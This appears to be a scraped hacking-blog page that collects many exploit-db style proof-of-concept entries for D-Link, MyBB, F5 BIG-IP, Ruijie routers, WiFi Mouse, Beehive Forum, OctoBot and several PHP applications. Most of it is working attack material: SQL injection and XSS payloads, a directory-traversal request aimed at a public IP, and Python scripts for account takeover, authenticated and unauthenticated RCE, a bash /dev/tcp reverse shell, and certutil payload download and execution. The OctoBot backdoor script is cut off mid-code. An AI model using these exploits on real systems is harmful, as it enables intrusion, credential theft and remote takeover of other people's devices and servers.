# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381
POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive
action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863582647
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Explore CMS 1.0 - SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: CVE-2022-27412
# POC
# SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page.
#Steps to reproduce
Following URL is vulnerable to SQL Injection in the 'id' field.
GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: REDACTED
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding
10.3.34-MariaDB
Server accepts the payload and the response get delayed by 7 seconds.
# Exploit Title: PHProjekt PhpSimplyGest v1.3.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-05-05
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130)
# Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects)
# Version: 1.3
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32)
# CVE: CVE-2022-27308
# Description:
A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from same vendor,
like "MyProjects") allows attacker to execute arbitrary web scripts or HTML.
Injecting persistent javascript code inside the title description (or content) while creating a project, todo, timecard,
estimates, report or finding, it will be triggered once page gets loaded.
# Steps to reproduce:
Click on Projects and add or edit an existing one,
Insert the following PoC inside the Title
<<SCRIPT>alert("XSS here");//\<</SCRIPT>
Click on 'Send'.
If a user visits the website dashboard, as well as project summary page, the javascript code will be rendered.
# Exploit Title: Beehive Forum - Account Takeover
# Date:08/05/2022.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.beehiveforum.co.uk/
# Software Link: https://sourceforge.net/projects/beehiveforum/
# Version: 1.5.2
# Tested on: Kali Linux and Ubuntu 20.0.4
# CVE N/A
# PoC: https://imgur.com/a/hVlgpCg
# Vulnerability: In the functionality "forgot password", it's possible to
modify the Header "Host", #injecting malicious host, allowing stealing the
token and resetting the password from a victim.#(Requires user interaction)
import requests
from bs4 import BeautifulSoup
import socket
import sys
import urllib.parse
import random
import string
endpoint = sys.argv[1]
lhost = sys.argv[2]
lport = int(sys.argv[3])
hostheader = f'{lhost}:{lport}'
url_forgot = f'http://{endpoint}/forum/forgot_pw.php'
url_change = f'http://{endpoint}/forum/change_pw.php'
def init_req():
session = requests.Session()
r = session.get(url_forgot)
cookie = session.cookies.get_dict()
cookie = cookie['sess_hash']
soup = BeautifulSoup(r.text, 'lxml')
hash_request = soup.input['id']
csrf_token = soup.input['value']
return hash_request, csrf_token, cookie
def forgot_req(hash_request: str, csrf_token: str, cookie: str):
headers= {
'Host': hostheader,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
'Cookie' : 'sess_hash=' + cookie
}
data = {
hash_request : csrf_token,
'webtag' : 'TEST',
'logon' : 'admin',
'request' : 'Request'
}
r = requests.post(url_forgot, headers=headers, data=data)
if('You should shortly receive an e-mail containing instructions for
resetting your password' in r.text):
print('')
print('[*] A mail has been sent to the victim')
socket_req()
else:
print('[*] The mail has not been sent')
def socket_req():
print(f"[*] Listening on port {lport}...." )
print('[*] Waitting the victim clicks in the malicious link\n')
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((lhost, lport))
s.listen()
(sock_c, _) = s.accept()
get_request = sock_c.recv(4096)
user_token = urllib.parse.unquote_plus(get_request.split(b"
HTTP")[0][-13:].decode("UTF-8"))
print("[*] Stole token: " + user_token)
change_pw(user_token)
def change_pw(user_token: str):
c = string.ascii_letters + string.digits
password = ''.join(random.choice(c) for _ in range(6))
hash_request, csrf_token, cookie = init_req()
headers= {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
'Cookie' : 'sess_hash=' + cookie
}
data = {
hash_request : csrf_token,
'webtag' : 'TEST',
'u' : '1',
'h' : user_token,
'pw' : password,
'cpw' : password,
'save' : 'Save'
}
r = requests.post(url_change, headers=headers, data=data)
if('Your password has been changed' in r.text):
print(f'[*] The password has been changed to: {password}')
else:
print('[*] The password has been changed')
hash_request, csrf_token, cookie = init_req()
forgot_req(hash_request, csrf_token, cookie)
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29
# Tested on: Linux
# CVE : CVE-2022-24734
# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting.
# The user must have a rights to add or update setting. This is tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f)
import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup
def login(username, password):
data = {
"username" : username,
"password" : password,
"do" : "login"
}
login_txt = r_client.post(host + "/admin/index.php", data=data).text
if "The username and password combination you entered is invalid" in login_txt:
print("[-] Login failure. Incorrect credentials supplied")
exit(0)
print("[+] Login successful!")
def add_settings(cmd, raw_cmd=""):
config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text
if "Access Denied" in config_settings_txt:
print("[-] Supplied user doesn't have the rights to add a setting")
exit(0)
print("[*] Adding a malicious settings...")
soup = BeautifulSoup(config_settings_txt, "lxml")
my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']
rand_string = get_rand_string()
if raw_cmd != "":
extra = "\" . system('{}') .\"".format(raw_cmd)
else:
extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)
data = {
"my_post_key" : my_post_key,
"title" : "An innocent setting",
"description" : "An innocent description",
"gid" : 1,
"disporder" : "",
"name" : rand_string,
"type" : "\tphp",
"extra" : extra,
"value" : "An innocent value"
}
post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)
if post_setting.status_code != 302:
soup = BeautifulSoup(post_setting.text, "lxml")
error_txt = soup.find_all("div", {"class" : "error"})[0].text
print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
exit(0)
print("[+] Malicious post settings accepted!")
return rand_string
def get_rand_string(length=20):
return ''.join(random.choice(string.ascii_letters) for i in range(length))
def get_cmd_result(ident_string, raw_cmd=""):
conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text
soup = BeautifulSoup(conf_settings_list, "lxml")
row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]
cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text
if raw_cmd == "":
cmd_result = b64decode(cmd_result[2:]).decode()
print("[+] Result: {}".format(str(cmd_result)))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()
username = args.username
password = args.password
host = args.host
cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd
r_client = requests.Session()
login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)
# Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.9
# Tested on: Ubuntu 20.04
To reproduce do the following:
1. Login as administrator user
2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d=
efault_960px" -> "Load Theme"
3. Select Template "categories.html"
4. Paste reverse shell code
5. Click "Save Changes"
6. Browse to "http://host/4images/categories.php?cat_id=3D1"
// HTTP POST request showing reverse shell payload
POST /4images/admin/templates.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
__csrf=3Dc39b7dea0ff15442681362d2a583c7a9&action=3Dsavetemplate&content=3D[=
REVERSE_SHELL_CODE]&template_file_name=3Dcategories.html&template_folder=3D=
default_960px[...]
// HTTP redirect response to specific template
GET /4images/categories.php?cat_id=3D1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
# nc -kvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43032
Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (20=
22-11-07) x86_64 GNU/Linux
13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
kali tty7 :0 11:58 2:18m 2:21 0.48s xfce4-sessi=
on
kali pts/1 - 11:58 1:40 24.60s 0.14s sudo su
uid=3D1(daemon) gid=3D1(daemon) groups=3D1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$=20
--sgnirk-7d26becc-c589-46c6-a348-fe09d4b162fe--
# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi
# Google Dork: intext:"Powered by Sexy Polling"
# Date: 2022-02-08
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://2glux.com/projects/sexypolling
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip
# Version: all versions below version 2.1.8
# Tested on: Debian Bullseye
SexyPolling SQL Injection
====================
| Identifier: | AIT-SA-20220208-01|
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |
Summary
========
[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.
Vulnerability Description
====================
In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.
In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:
```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```
These are later used unfiltered by the WHERE clause:
```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";
//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```
Proof Of Concept
==============
To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.
HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1
Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6
polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-®ion_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
```
The HTTP-Resoonse contains a mysql error:
```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
```
Vulnerable Versions
================
All versions below version 2.1.8
Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7
Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.
Mitigation
=========
Sexy Polling 2.1.8 fixed that issue
Vendor Contact Timeline
====================
| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |
*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*
Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164
#!/usr/bin/python3
import os
import sys
import time
import requests
import json
def enc(PASS):
key = "RjYkhwzx$2018!"
shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
return os.popen(shell).read().strip()
try:
TARGET = sys.argv[1]
USER = sys.argv[2]
PASS = sys.argv[3]
COMMAND = sys.argv[4]
except Exception:
print("CVE-2021-43164 PoC")
print("Usage: python3 exploit.py <target> <user> <pass> <command>")
print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
sys.exit(1)
endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
"method": "login",
"params": {
"username": USER,
"password": enc(PASS),
"encry": True,
"time": int(time.time()),
"limit": False
}
}
r = requests.post(endpoint, json=payload)
sid = json.loads(r.text)["data"]["sid"]
endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
"method": "updateVersion",
"params": {
"jsonparam": "'; {} #".format(COMMAND)
}
}
r = requests.post(endpoint, json=payload)
print(r.text)
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# Vulnerable Code:
$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
LOWER(firstname) LIKE '%{$w}%' OR
LOWER(department) LIKE '%{$w}%' OR
LOWER(email) LIKE '%{$w}%'" : "");
# Vulnerable URL
http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]
# POC
```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```
# POC Image
https://prnt.sc/AECcFRHhe2ib
# Exploit Title: TLR-2005KSH - Arbitrary File Upload
# Date: 2022-05-11
# Shodan Dork: title:"Login to TLR-2021"
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-45428
# Vulnerability Description
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
# on the remote server,telesquare TLR-2021 allows unauthorized users to upload
# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
# remote code execution as well.
# Due to the WebDAV, it is possible to upload the arbitrary
# file utilizing the PUT method.
# Proof-of-Concept
# Request
PUT /l6f3jd6cbf.txt HTTP/1.1
Host: 223.62.114.233:8081<http://223.62.114.233:8081/>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Length: 10
# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388
from requests import Request, Session
import sys
import json
def title():
print('''
_______ ________ ___ ___ ___ ___ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ <
| |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) |
\_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')
def exploit(url, lhost, lport):
url = url + 'mgmt/tm/util/bash'
data = {
"command":"run",
"utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
}
headers = {
'Authorization': 'Basic YWRtaW46',
'Connection':'keep-alive, X-F5-Auth-Token',
'X-F5-Auth-Token': '0'
}
s = Session()
req = Request('POST', url, json=data, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15
)
#print(prepped.headers)
#print(url)
#print(resp.headers)
#print(resp.json())
print(resp.status_code)
if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079
------------------------------------------------------------------------------------
1. Description:
----------------------
College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
4. Burpsuite request:
----------------------
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution
# Date: 25-02-2021
# Author: H4rk3nz0
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.7.8.5
# Tested on: Windows Enterprise Build 17763
# Python 3 port done by RedHatAugust
# Original exploit: https://www.exploit-db.com/exploits/49601
# Tested on: Windows 10 Pro Build 15063
# Desktop Server software used by mobile app has PIN option which does not to prevent command input.
# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import sys
import string
target = socket(AF_INET, SOCK_STREAM)
port = 1978
try:
rhost = sys.argv[1]
lhost = sys.argv[2]
payload = sys.argv[3]
except:
print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>")
exit()
characters={
"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}
def openCMD():
target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe
def SendString(string):
for char in string:
target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding
sleep(0.03)
def SendReturn():
target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app
sleep(0.5)
def exploit():
print("[+] 3..2..1..")
sleep(2)
openCMD()
print("[+] *Super fast hacker typing*")
sleep(1)
SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload)
SendReturn()
print("[+] Retrieving payload")
sleep(3)
SendString("C:\\Windows\\Temp\\" + payload)
SendReturn()
print("[+] Done! Check Your Listener?")
def main():
target.connect((rhost,port))
exploit()
target.close()
exit()
if __name__=="__main__":
main()
# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
# Date: 9/2/2021
# Exploit Author: Samy Younsi, Thomas Knudsen
# Vendor Homepage: https://www.octobot.online/
# Software Link: https://github.com/Drakkar-Software/OctoBot
# Version: 0.4.0beta3 - 0.4.3
# Tested on: Linux (Ubuntu, CentOs)
# CVE : CVE-2021-36711
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import zipfile
import time
import sys
import os
def banner():
sashimiLogo = """
_________ . .
(.. \_ , |\ /|
\ O \ /| \ \/ /
\______ \/ | \ /
vvvv\ \ | / |
_ _ _ _ \^^^^ == \_/ |
| | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. |
/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / |
\__ | (_| \__ | | | | | | | | | | ||/ \_ \| /
( /\__,_( |_| |_|_|_| |_| |_|_| \________/
|_| |_| \033[1;91mOctoBot Killer\033[1;m
Author: \033[1;92mNaqwada\033[1;m
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(sashimiLogo))
def help():
print('[!] \033[1;93mUsage: \033[1;m')
print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0]))
print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.')
def getOctobotVersion(RHOST, RPORT):
if RPORT == 443:
url = 'https://{}:{}/api/version'.format(RHOST, RPORT)
else:
url = 'http://{}:{}/api/version'.format(RHOST, RPORT)
return curl(url)
def restartOctobot(RHOST, RPORT):
if RPORT == 443:
url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT)
else:
url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT)
try:
requests.get(url, allow_redirects=False, verify=False, timeout=1)
except requests.exceptions.ConnectionError as e:
print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m')
time.sleep(30)
def downloadTentaclePackage(octobotVersion):
print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion))
url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)
result = requests.get(url, stream=True)
with open('{}.zip'.format(octobotVersion), 'wb') as fd:
for chunk in result.iter_content(chunk_size=128):
fd.write(chunk)
print('[+] \033[1;92mDownload completed!\033[1;m')
def unzipTentaclePackage(octobotVersion):
zip = zipfile.ZipFile('{}.zip'.format(octobotVersion))
zip.extractall('quests')
os.remove('{}.zip'.format(octobotVersion))
print('[+] \033[1;92mTentacle package has been extracted.\033[1;m')
def craftBackdoor(octobotVersion):
print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion))
path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/'
injectInitFile(path)
injectMetadataFile(path)
print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion))
def injectMetadataFile(path):
with open('{}metadata.py'.format(path),'r') as metadataFile:
content = metadataFile.read()
addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty'))
